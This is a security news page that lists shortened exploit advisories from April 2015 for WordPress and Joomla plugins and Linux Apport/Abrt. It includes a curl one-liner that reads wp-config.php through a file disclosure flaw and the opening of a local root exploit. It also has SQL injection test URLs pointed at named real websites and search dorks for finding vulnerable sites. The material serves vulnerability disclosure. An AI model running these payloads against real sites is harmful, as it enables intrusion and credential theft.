WordPress Fusion Engage Local File Disclosure

16 aprile 2015 - Fonte: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
    }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...

Leggi il seguito »

WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax functions wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...

Leggi il seguito »

WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 aprile 2015 - Fonte: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...

Leggi il seguito »

Linux Abrt / Apport Race Condition / Symlink

16 aprile 2015 - Fonte: http://www.mondounix.com
Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in two different implementations, apport and abrt respectively). These were discussed on the vendors list last week.
 
If the first character of kern.core_pattern sysctl is a pipe, the kernel will invoke the specified program, and pass it the core on stdin. Apport (Ubuntu) and Abrt (Fedora) use this feature to analyze and log crashes.
 
Since the introduction of containers, Abrt and Apport have attempted to transparently handle namespaces by chrooting into the same root as the crashing program [1] [2]. Unfortunately, this is incorrect because root cannot safely execve() after a chroot into a user specified directory.
 
Furthermore, Abrt suffers from numerous...

Leggi il seguito »

Linux Apport/Abrt Local Root Exploit

15 aprile 2015 - Fonte: http://www.mondounix.com
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>
 
# warning this file must be compiled with -static
 
//
// Apport/Abrt Vulnerability Demo Exploit.
//
//  Apport: CVE-2015-1318
//  Abrt:   CVE-2015-1862
// 
//   -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To...

Leggi il seguito »

Linux splice_write Kernel Panic

14 aprile 2015 - Fonte: http://www.mondounix.com
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 * 
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, 
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * Works on ext4 filesystem
 * Tested on Ubuntu with 3.13 and 3.14 kernels
 * 
 * Compile with gcc -fno-stack-protector...

Leggi il seguito »

WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 aprile 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...

Leggi il seguito »

Joomla Contact Form Maker 1.0.1 SQL Injection

3 aprile 2015 - Fonte: http://www.mondounix.com
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'

(9)

...

Leggi il seguito »

Joomla Gallery WD SQL Injection

3 aprile 2015 - Fonte: http://www.mondounix.com
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
 
parameter 'theme_id' in GET vulnerable
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT...

Leggi il seguito »

WordPress Revolution Slider File Upload

3 aprile 2015 - Fonte: http://www.mondounix.com
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
 
 
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303....

Leggi il seguito »